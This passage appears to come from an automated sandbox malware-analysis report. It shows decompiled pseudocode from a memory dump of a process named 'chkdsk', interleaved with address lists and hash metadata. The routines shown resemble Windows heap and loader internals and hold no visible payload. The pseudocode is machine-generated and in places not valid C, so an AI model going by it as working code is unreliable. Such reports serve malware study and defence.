                                                      									 *(_t237 - 0x4c) = _t161;
                                                      								} else {
                                                      									 *(_t235 + 4) = _t236;
                                                      									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                      								}
                                                      								 *((intOrPtr*)(_t237 - 0x54)) = E04DC37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                      								_t224 = _t236;
                                                      								 *(_t237 - 0x40) = _t236;
                                                      								 *(_t237 - 0x50) = _t236;
                                                      								while(1) {
                                                      									_t163 =  *(_t235 + 8);
                                                      									__eflags = _t224 - _t163;
                                                      									if(_t224 >= _t163) {
                                                      										break;
                                                      									}
                                                      									_t228 =  *0x4e77b9c; // 0x0
                                                      									_t214 = L04DA4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                      									 *(_t237 - 0x78) = _t214;
                                                      									__eflags = _t214;
                                                      									if(_t214 == 0) {
                                                      										L52:
                                                      										_t193 = 0xc0000017;
                                                      										L19:
                                                      										 *(_t237 - 0x44) = _t193;
                                                      										L20:
                                                      										_t206 =  *(_t237 - 0x40);
                                                      										__eflags = _t206;
                                                      										if(_t206 == 0) {
                                                      											L26:
                                                      											__eflags = _t193;
                                                      											if(_t193 < 0) {
                                                      												E04DC37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                      												__eflags =  *((char*)(_t237 - 0x39));
                                                      												if( *((char*)(_t237 - 0x39)) != 0) {
                                                      													 *0x4e77b10 =  *0x4e77b10 - 8;
                                                      												}
                                                      											} else {
                                                      												_t169 =  *(_t237 - 0x68);
                                                      												__eflags = _t169;
                                                      												if(_t169 != 0) {
                                                      													 *0x4e77b04 =  *0x4e77b04 - _t169;
                                                      												}
                                                      											}
                                                      											__eflags = _t193;
                                                      											if(_t193 >= 0) {
                                                      												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                      											}
                                                      											goto L30;
                                                      										}
                                                      										_t226 = _t206 * 0xc;
                                                      										__eflags = _t226;
                                                      										_t194 =  *(_t237 - 0x48);
                                                      										do {
                                                      											 *(_t237 - 0x40) = _t206 - 1;
                                                      											_t226 = _t226 - 0xc;
                                                      											 *(_t237 - 0x4c) = _t226;
                                                      											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                      											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                      												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                      												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                      													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                      													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                      													__eflags =  *((char*)(_t237 - 0x39));
                                                      													if( *((char*)(_t237 - 0x39)) == 0) {
                                                      														_t171 = _t210;
                                                      													} else {
                                                      														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                      														L04DA77F0(_t194, _t236, _t210 - 8);
                                                      														_t171 =  *(_t237 - 0x50);
                                                      													}
                                                      													L48:
                                                      													L04DA77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                      													L46:
                                                      													_t206 =  *(_t237 - 0x40);
                                                      													_t226 =  *(_t237 - 0x4c);
                                                      													goto L24;
                                                      												}
                                                      												 *0x4e77b08 =  *0x4e77b08 + 1;
                                                      												goto L24;
                                                      											}
                                                      											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                      											__eflags = _t171;
                                                      											if(_t171 != 0) {
                                                      												__eflags =  *((char*)(_t237 - 0x39));
                                                      												if( *((char*)(_t237 - 0x39)) == 0) {
                                                      													goto L48;
                                                      												}
                                                      												E04DC57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                      												goto L46;
                                                      											}
                                                      											L24:
                                                      											__eflags = _t206;
                                                      										} while (_t206 != 0);
                                                      										_t193 =  *(_t237 - 0x44);
                                                      										goto L26;
                                                      									}
                                                      									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                      									 *(_t237 - 0x7c) = _t232;
                                                      									 *(_t232 - 4) = _t214;
                                                      									 *(_t237 - 4) = _t236;
                                                      									E04DCF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                      									_t238 = _t238 + 0xc;
                                                      									 *(_t237 - 4) = 0xfffffffe;
                                                      									_t215 =  *(_t237 - 0x48);
                                                      									__eflags = _t193;
                                                      									if(_t193 < 0) {
                                                      										L04DA77F0(_t215, _t236,  *(_t237 - 0x78));
                                                      										goto L20;
                                                      									}
                                                      									__eflags =  *((char*)(_t237 - 0x39));
                                                      									if( *((char*)(_t237 - 0x39)) != 0) {
                                                      										_t233 = E04DBA44B( *(_t237 - 0x4c));
                                                      										 *(_t237 - 0x50) = _t233;
                                                      										__eflags = _t233;
                                                      										if(_t233 == 0) {
                                                      											L04DA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                      											goto L52;
                                                      										}
                                                      										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                      										L17:
                                                      										_t234 =  *(_t237 - 0x40);
                                                      										_t218 = _t234 * 0xc;
                                                      										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                      										 *(_t218 + _t235 + 0x10) = _t236;
                                                      										_t224 = _t234 + 1;
                                                      										 *(_t237 - 0x40) = _t224;
                                                      										 *(_t237 - 0x50) = _t224;
                                                      										_t193 =  *(_t237 - 0x44);
                                                      										continue;
                                                      									}
                                                      									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                      									goto L17;
                                                      								}
                                                      								 *_t235 = _t236;
                                                      								_t165 = 0x10 + _t163 * 0xc;
                                                      								__eflags = _t165;
                                                      								_push(_t165);
                                                      								_push(_t235);
                                                      								_push(0x23);
                                                      								_push(0xffffffff);
                                                      								_t193 = E04DC96C0();
                                                      								goto L19;
                                                      							} else {
                                                      								goto L50;
                                                      							}
                                                      						}
                                                      						_t235 = _t237 - 0x38;
                                                      						 *(_t237 - 0x60) = _t235;
                                                      						goto L8;
                                                      					}
                                                      					goto L4;
                                                      				}
                                                      			}

































                                                      0x04de9b5f
                                                      0x04d985e6
                                                      0x04d985ea
                                                      0x04d986c3
                                                      0x04d986c5
                                                      0x04d986c8
                                                      0x04d986ca
                                                      0x04de9b16
                                                      0x00000000
                                                      0x04de9b16
                                                      0x04d986d6
                                                      0x04d985f6
                                                      0x04d985f6
                                                      0x04d985f9
                                                      0x04d98602
                                                      0x04d98606
                                                      0x04d9860a
                                                      0x04d9860b
                                                      0x04d9860e
                                                      0x04d98611
                                                      0x00000000
                                                      0x04d98611
                                                      0x04d985f3
                                                      0x00000000
                                                      0x04d985f3
                                                      0x04d98619
                                                      0x04d9861e
                                                      0x04d9861e
                                                      0x04d98621
                                                      0x04d98622
                                                      0x04d98623
                                                      0x04d98625
                                                      0x04d9862c
                                                      0x00000000
                                                      0x04d9873d
                                                      0x00000000
                                                      0x04d9873d
                                                      0x04d98737
                                                      0x04d9850f
                                                      0x04d98512
                                                      0x00000000
                                                      0x04d98512
                                                      0x00000000
                                                      0x04d984d6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70fb059bc91e948de691826652e4bdd18f6a12cff4f86c1cc8617bb3ba345105
                                                      • Instruction ID: 74c8e2c57a79674601afcb2d48115083083ad1cb3bb3f79b13ffb4dfec30a747
                                                      • Opcode Fuzzy Hash: 70fb059bc91e948de691826652e4bdd18f6a12cff4f86c1cc8617bb3ba345105
                                                      • Instruction Fuzzy Hash: 8DB125B0F102099FDF25EFA9C984AADBBB6FF49704F10412AE405AB245E770BC45DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E04DB513A(intOrPtr __ecx, void* __edx) {
                                                      				signed int _v8;
                                                      				signed char _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				intOrPtr _v44;
                                                      				intOrPtr _v48;
                                                      				char _v63;
                                                      				char _v64;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed char* _v92;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				char _v105;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* _t157;
                                                      				signed int _t159;
                                                      				signed int _t160;
                                                      				unsigned int* _t161;
                                                      				intOrPtr _t165;
                                                      				signed int _t172;
                                                      				signed char* _t181;
                                                      				intOrPtr _t189;
                                                      				intOrPtr* _t200;
                                                      				signed int _t202;
                                                      				signed int _t203;
                                                      				char _t204;
                                                      				signed int _t207;
                                                      				signed int _t208;
                                                      				void* _t209;
                                                      				intOrPtr _t210;
                                                      				signed int _t212;
                                                      				signed int _t214;
                                                      				signed int _t221;
                                                      				signed int _t222;
                                                      				signed int _t226;
                                                      				intOrPtr* _t232;
                                                      				signed int _t233;
                                                      				signed int _t234;
                                                      				intOrPtr _t237;
                                                      				intOrPtr _t238;
                                                      				intOrPtr _t240;
                                                      				void* _t245;
                                                      				signed int _t246;
                                                      				signed int _t247;
                                                      				void* _t248;
                                                      				void* _t251;
                                                      				void* _t252;
                                                      				signed int _t253;
                                                      				signed int _t255;
                                                      				signed int _t256;
                                                      
                                                      				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                      				_v8 =  *0x4e7d360 ^ _t255;
                                                      				_v32 = _v32 & 0x00000000;
                                                      				_t251 = __edx;
                                                      				_t237 = __ecx;
                                                      				_t212 = 6;
                                                      				_t245 =  &_v84;
                                                      				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                      				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                      				_v48 = __ecx;
                                                      				_v36 = _t207;
                                                      				_t157 = memset(_t245, 0, _t212 << 2);
                                                      				_t256 = _t255 + 0xc;
                                                      				_t246 = _t245 + _t212;
                                                      				if(_t207 == 2) {
                                                      					_t247 =  *(_t237 + 0x60);
                                                      					_t208 =  *(_t237 + 0x64);
                                                      					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                      					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                      					_v104 = _t159;
                                                      					_v76 = _t159;
                                                      					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                      					_v100 = _t160;
                                                      					_v72 = _t160;
                                                      					L19:
                                                      					_v80 = _t208;
                                                      					_v84 = _t247;
                                                      					L8:
                                                      					_t214 = 0;
                                                      					if( *(_t237 + 0x74) > 0) {
                                                      						_t82 = _t237 + 0x84; // 0x124
                                                      						_t161 = _t82;
                                                      						_v92 = _t161;
                                                      						while( *_t161 >> 0x1f != 0) {
                                                      							_t200 = _v92;
                                                      							if( *_t200 == 0x80000000) {
                                                      								break;
                                                      							}
                                                      							_t214 = _t214 + 1;
                                                      							_t161 = _t200 + 0x10;
                                                      							_v92 = _t161;
                                                      							if(_t214 <  *(_t237 + 0x74)) {
                                                      								continue;
                                                      							}
                                                      							goto L9;
                                                      						}
                                                      						_v88 = _t214 << 4;
                                                      						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                      						_t165 = 0;
                                                      						asm("adc eax, [ecx+edx+0x7c]");
                                                      						_v24 = _t165;
                                                      						_v28 = _v40;
                                                      						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                      						_t221 = _v40;
                                                      						_v16 =  *_v92;
                                                      						_v32 =  &_v28;
                                                      						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                      							goto L9;
                                                      						}
                                                      						_t240 = _v48;
                                                      						if( *_v92 != 0x80000000) {
                                                      							goto L9;
                                                      						}
                                                      						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                      						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                      						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                      						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                      						_t226 = 0;
                                                      						_t181 = _t251 + 0x66;
                                                      						_v88 = 0;
                                                      						_v92 = _t181;
                                                      						do {
                                                      							if( *((char*)(_t181 - 2)) == 0) {
                                                      								goto L31;
                                                      							}
                                                      							_t226 = _v88;
                                                      							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                      								_t181 = E04DCD0F0(1, _t226 + 0x20, 0);
                                                      								_t226 = _v40;
                                                      								 *(_t226 + 8) = _t181;
                                                      								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                      								L34:
                                                      								if(_v44 == 0) {
                                                      									goto L9;
                                                      								}
                                                      								_t210 = _v44;
                                                      								_t127 = _t210 + 0x1c; // 0x1c
                                                      								_t249 = _t127;
                                                      								E04DA2280(_t181, _t127);
                                                      								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                      								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                      								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                      								}
                                                      								_t189 = L04DA4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                      								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                      								if(_t189 != 0) {
                                                      									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                      									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                      									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                      									 *_t232 = _t232 + 0x10;
                                                      									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                      									E04DCF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                      									_t256 = _t256 + 0xc;
                                                      								}
                                                      								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                      								E04D9FFB0(_t210, _t249, _t249);
                                                      								_t222 = _v76;
                                                      								_t172 = _v80;
                                                      								_t208 = _v84;
                                                      								_t247 = _v88;
                                                      								L10:
                                                      								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                      								_v44 = _t238;
                                                      								if(_t238 != 0) {
                                                      									 *0x4e7b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                      									_v44();
                                                      								}
                                                      								_pop(_t248);
                                                      								_pop(_t252);
                                                      								_pop(_t209);
                                                      								return E04DCB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                      							}
                                                      							_t181 = _v92;
                                                      							L31:
                                                      							_t226 = _t226 + 1;
                                                      							_t181 =  &(_t181[0x18]);
                                                      							_v88 = _t226;
                                                      							_v92 = _t181;
                                                      						} while (_t226 < 4);
                                                      						goto L34;
                                                      					}
                                                      					L9:
                                                      					_t172 = _v104;
                                                      					_t222 = _v100;
                                                      					goto L10;
                                                      				}
                                                      				_t247 = _t246 | 0xffffffff;
                                                      				_t208 = _t247;
                                                      				_v84 = _t247;
                                                      				_v80 = _t208;
                                                      				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                      					_t233 = _v72;
                                                      					_v105 = _v64;
                                                      					_t202 = _v76;
                                                      				} else {
                                                      					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                      					_v105 = 1;
                                                      					if(_v63 <= _t204) {
                                                      						_v63 = _t204;
                                                      					}
                                                      					_t202 = _v76 |  *(_t251 + 0x40);
                                                      					_t233 = _v72 |  *(_t251 + 0x44);
                                                      					_t247 =  *(_t251 + 0x38);
                                                      					_t208 =  *(_t251 + 0x3c);
                                                      					_v76 = _t202;
                                                      					_v72 = _t233;
                                                      					_v84 = _t247;
                                                      					_v80 = _t208;
                                                      				}
                                                      				_v104 = _t202;
                                                      				_v100 = _t233;
                                                      				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                      					_t237 = _v48;
                                                      					_v105 = 1;
                                                      					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                      						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                      						_t237 = _v48;
                                                      					}
                                                      					_t203 = _t202 |  *(_t251 + 0xb8);
                                                      					_t234 = _t233 |  *(_t251 + 0xbc);
                                                      					_t247 = _t247 &  *(_t251 + 0xb0);
                                                      					_t208 = _t208 &  *(_t251 + 0xb4);
                                                      					_v104 = _t203;
                                                      					_v76 = _t203;
                                                      					_v100 = _t234;
                                                      					_v72 = _t234;
                                                      					_v84 = _t247;
                                                      					_v80 = _t208;
                                                      				}
                                                      				if(_v105 == 0) {
                                                      					_v36 = _v36 & 0x00000000;
                                                      					_t208 = 0;
                                                      					_t247 = 0;
                                                      					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                      					goto L19;
                                                      				} else {
                                                      					_v36 = 1;
                                                      					goto L8;
                                                      				}
                                                      			}
                                                      0x04db520c
                                                      0x04db520c
                                                      0x04db520f
                                                      0x04db5215
                                                      0x04db5234
                                                      0x04db523a
                                                      0x04db523a
                                                      0x04db5244
                                                      0x04db5245
                                                      0x04db5246
                                                      0x04db5251
                                                      0x04db5251
                                                      0x04df6f13
                                                      0x04df6f17
                                                      0x04df6f17
                                                      0x04df6f18
                                                      0x04df6f1b
                                                      0x04df6f1f
                                                      0x04df6f23
                                                      0x00000000
                                                      0x04df6f28
                                                      0x04db5204
                                                      0x04db5204
                                                      0x04db5208
                                                      0x00000000
                                                      0x04db5208
                                                      0x04db5185
                                                      0x04db5188
                                                      0x04db518a
                                                      0x04db518e
                                                      0x04db5195
                                                      0x04df6db1
                                                      0x04df6db5
                                                      0x04df6db9
                                                      0x04db519b
                                                      0x04db519b
                                                      0x04db519e
                                                      0x04db51a7
                                                      0x04db51a9
                                                      0x04db51a9
                                                      0x04db51b5
                                                      0x04db51b8
                                                      0x04db51bb
                                                      0x04db51be
                                                      0x04db51c1
                                                      0x04db51c5
                                                      0x04db51c9
                                                      0x04db51cd
                                                      0x04db51cd
                                                      0x04db51d8
                                                      0x04db51dc
                                                      0x04db51e0
                                                      0x04df6dcc
                                                      0x04df6dd0
                                                      0x04df6dd5
                                                      0x04df6ddd
                                                      0x04df6de1
                                                      0x04df6de1
                                                      0x04df6de5
                                                      0x04df6deb
                                                      0x04df6df1
                                                      0x04df6df7
                                                      0x04df6dfd
                                                      0x04df6e01
                                                      0x04df6e05
                                                      0x04df6e09
                                                      0x04df6e0d
                                                      0x04df6e11
                                                      0x04df6e11
                                                      0x04db51eb
                                                      0x04df6e1a
                                                      0x04df6e1f
                                                      0x04df6e21
                                                      0x04df6e23
                                                      0x00000000
                                                      0x04db51f1
                                                      0x04db51f1
                                                      0x00000000
                                                      0x04db51f1

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b8c7be0c3a1bca370bd042b61bb71da0f95dbb9d1b6c6a630bf1de8fafe8f698
                                                      • Instruction ID: 24afcaf6ca93f039ef2ebc32b3602418576a639bec3e33aaae6496912de1c003
                                                      • Opcode Fuzzy Hash: b8c7be0c3a1bca370bd042b61bb71da0f95dbb9d1b6c6a630bf1de8fafe8f698
                                                      • Instruction Fuzzy Hash: 78C115756093809FD354CF28C980A5AFBE1BF88308F144A6EF9998B352D771E945CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E04DB03E2(signed int __ecx, signed int __edx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				char _v52;
                                                      				char _v56;
                                                      				char _v64;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t56;
                                                      				signed int _t58;
                                                      				char* _t64;
                                                      				intOrPtr _t65;
                                                      				signed int _t74;
                                                      				signed int _t79;
                                                      				char* _t83;
                                                      				intOrPtr _t84;
                                                      				signed int _t93;
                                                      				signed int _t94;
                                                      				signed char* _t95;
                                                      				signed int _t99;
                                                      				signed int _t100;
                                                      				signed char* _t101;
                                                      				signed int _t105;
                                                      				signed int _t119;
                                                      				signed int _t120;
                                                      				void* _t122;
                                                      				signed int _t123;
                                                      				signed int _t127;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t127;
                                                      				_t119 = __ecx;
                                                      				_t105 = __edx;
                                                      				_t118 = 0;
                                                      				_v20 = __edx;
                                                      				_t120 =  *(__ecx + 0x20);
                                                      				if(E04DB0548(__ecx, 0) != 0) {
                                                      					_t56 = 0xc000022d;
                                                      					L23:
                                                      					return E04DCB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                      				} else {
                                                      					_v12 = _v12 | 0xffffffff;
                                                      					_t58 = _t120 + 0x24;
                                                      					_t109 =  *(_t120 + 0x18);
                                                      					_t118 = _t58;
                                                      					_v16 = _t58;
                                                      					E04D9B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                      					_v52 = 0x18;
                                                      					_v48 = 0;
                                                      					0x840 = 0x40;
                                                      					if( *0x4e77c1c != 0) {
                                                      					}
                                                      					_v40 = 0x840;
                                                      					_v44 = _t105;
                                                      					_v36 = 0;
                                                      					_v32 = 0;
                                                      					if(E04DA7D50() != 0) {
                                                      						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      					} else {
                                                      						_t64 = 0x7ffe0384;
                                                      					}
                                                      					if( *_t64 != 0) {
                                                      						_t65 =  *[fs:0x30];
                                                      						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                      						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                      							_t100 = E04DA7D50();
                                                      							__eflags = _t100;
                                                      							if(_t100 == 0) {
                                                      								_t101 = 0x7ffe0385;
                                                      							} else {
                                                      								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      							}
                                                      							__eflags =  *_t101 & 0x00000020;
                                                      							if(( *_t101 & 0x00000020) != 0) {
                                                      								_t118 = _t118 | 0xffffffff;
                                                      								_t109 = 0x1485;
                                                      								E04E07016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                      							}
                                                      						}
                                                      					}
                                                      					_t105 = 0;
                                                      					while(1) {
                                                      						_push(0x60);
                                                      						_push(5);
                                                      						_push( &_v64);
                                                      						_push( &_v52);
                                                      						_push(0x100021);
                                                      						_push( &_v12);
                                                      						_t122 = E04DC9830();
                                                      						if(_t122 >= 0) {
                                                      							break;
                                                      						}
                                                      						__eflags = _t122 - 0xc0000034;
                                                      						if(_t122 == 0xc0000034) {
                                                      							L38:
                                                      							_t120 = 0xc0000135;
                                                      							break;
                                                      						}
                                                      						__eflags = _t122 - 0xc000003a;
                                                      						if(_t122 == 0xc000003a) {
                                                      							goto L38;
                                                      						}
                                                      						__eflags = _t122 - 0xc0000022;
                                                      						if(_t122 != 0xc0000022) {
                                                      							break;
                                                      						}
                                                      						__eflags = _t105;
                                                      						if(__eflags != 0) {
                                                      							break;
                                                      						}
                                                      						_t109 = _t119;
                                                      						_t99 = E04E069A6(_t119, __eflags);
                                                      						__eflags = _t99;
                                                      						if(_t99 == 0) {
                                                      							break;
                                                      						}
                                                      						_t105 = _t105 + 1;
                                                      					}
                                                      					if( !_t120 >= 0) {
                                                      						L22:
                                                      						_t56 = _t120;
                                                      						goto L23;
                                                      					}
                                                      					if( *0x4e77c04 != 0) {
                                                      						_t118 = _v12;
                                                      						_t120 = E04E0A7AC(_t119, _t118, _t109);
                                                      						__eflags = _t120;
                                                      						if(_t120 >= 0) {
                                                      							goto L10;
                                                      						}
                                                      						__eflags =  *0x4e77bd8;
                                                      						if( *0x4e77bd8 != 0) {
                                                      							L20:
                                                      							if(_v12 != 0xffffffff) {
                                                      								_push(_v12);
                                                      								E04DC95D0();
                                                      							}
                                                      							goto L22;
                                                      						}
                                                      					}
                                                      					L10:
                                                      					_push(_v12);
                                                      					_t105 = _t119 + 0xc;
                                                      					_push(0x1000000);
                                                      					_push(0x10);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push(0xf);
                                                      					_push(_t105);
                                                      					_t120 = E04DC99A0();
                                                      					if(_t120 < 0) {
                                                      						__eflags = _t120 - 0xc000047e;
                                                      						if(_t120 == 0xc000047e) {
                                                      							L51:
                                                      							_t74 = E04E03540(_t120);
                                                      							_t119 = _v16;
                                                      							_t120 = _t74;
                                                      							L52:
                                                      							_t118 = 0x1485;
                                                      							E04D8B1E1(_t120, 0x1485, 0, _t119);
                                                      							goto L20;
                                                      						}
                                                      						__eflags = _t120 - 0xc000047f;
                                                      						if(_t120 == 0xc000047f) {
                                                      							goto L51;
                                                      						}
                                                      						__eflags = _t120 - 0xc0000462;
                                                      						if(_t120 == 0xc0000462) {
                                                      							goto L51;
                                                      						}
                                                      						_t119 = _v16;
                                                      						__eflags = _t120 - 0xc0000017;
                                                      						if(_t120 != 0xc0000017) {
                                                      							__eflags = _t120 - 0xc000009a;
                                                      							if(_t120 != 0xc000009a) {
                                                      								__eflags = _t120 - 0xc000012d;
                                                      								if(_t120 != 0xc000012d) {
                                                      									_v28 = _t119;
                                                      									_push( &_v56);
                                                      									_push(1);
                                                      									_v24 = _t120;
                                                      									_push( &_v28);
                                                      									_push(1);
                                                      									_push(2);
                                                      									_push(0xc000007b);
                                                      									_t79 = E04DCAAF0();
                                                      									__eflags = _t79;
                                                      									if(_t79 >= 0) {
                                                      										__eflags =  *0x4e78474 - 3;
                                                      										if( *0x4e78474 != 3) {
                                                      											 *0x4e779dc =  *0x4e779dc + 1;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L52;
                                                      					}
                                                      					if(E04DA7D50() != 0) {
                                                      						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      					} else {
                                                      						_t83 = 0x7ffe0384;
                                                      					}
                                                      					if( *_t83 != 0) {
                                                      						_t84 =  *[fs:0x30];
                                                      						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                      						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                      							_t94 = E04DA7D50();
                                                      							__eflags = _t94;
                                                      							if(_t94 == 0) {
                                                      								_t95 = 0x7ffe0385;
                                                      							} else {
                                                      								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      							}
                                                      							__eflags =  *_t95 & 0x00000020;
                                                      							if(( *_t95 & 0x00000020) != 0) {
                                                      								E04E07016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                      							}
                                                      						}
                                                      					}
                                                      					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                      						if( *0x4e78708 != 0) {
                                                      							_t118 =  *0x7ffe0330;
                                                      							_t123 =  *0x4e77b00; // 0x0
                                                      							asm("ror esi, cl");
                                                      							 *0x4e7b1e0(_v12, _v20, 0x20);
                                                      							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                      							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                      							asm("sbb esi, esi");
                                                      							_t120 =  ~_t50 & _t93;
                                                      						} else {
                                                      							_t120 = 0;
                                                      						}
                                                      					}
                                                      					if( !_t120 >= 0) {
                                                      						L19:
                                                      						_push( *_t105);
                                                      						E04DC95D0();
                                                      						 *_t105 =  *_t105 & 0x00000000;
                                                      						goto L20;
                                                      					}
                                                      					_t120 = E04D97F65(_t119);
                                                      					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                      						__eflags = _t120;
                                                      						if(_t120 < 0) {
                                                      							goto L19;
                                                      						}
                                                      						 *(_t119 + 0x64) = _v12;
                                                      						goto L22;
                                                      					}
                                                      					goto L19;
                                                      				}
                                                      			}
                                                      0x00000000
                                                      0x04df4d05
                                                      0x04df4d07
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d0d
                                                      0x04df4d0f
                                                      0x04df4d14
                                                      0x04df4d16
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d1c
                                                      0x04df4d1c
                                                      0x04db0499
                                                      0x04db0535
                                                      0x04db0535
                                                      0x00000000
                                                      0x04db0535
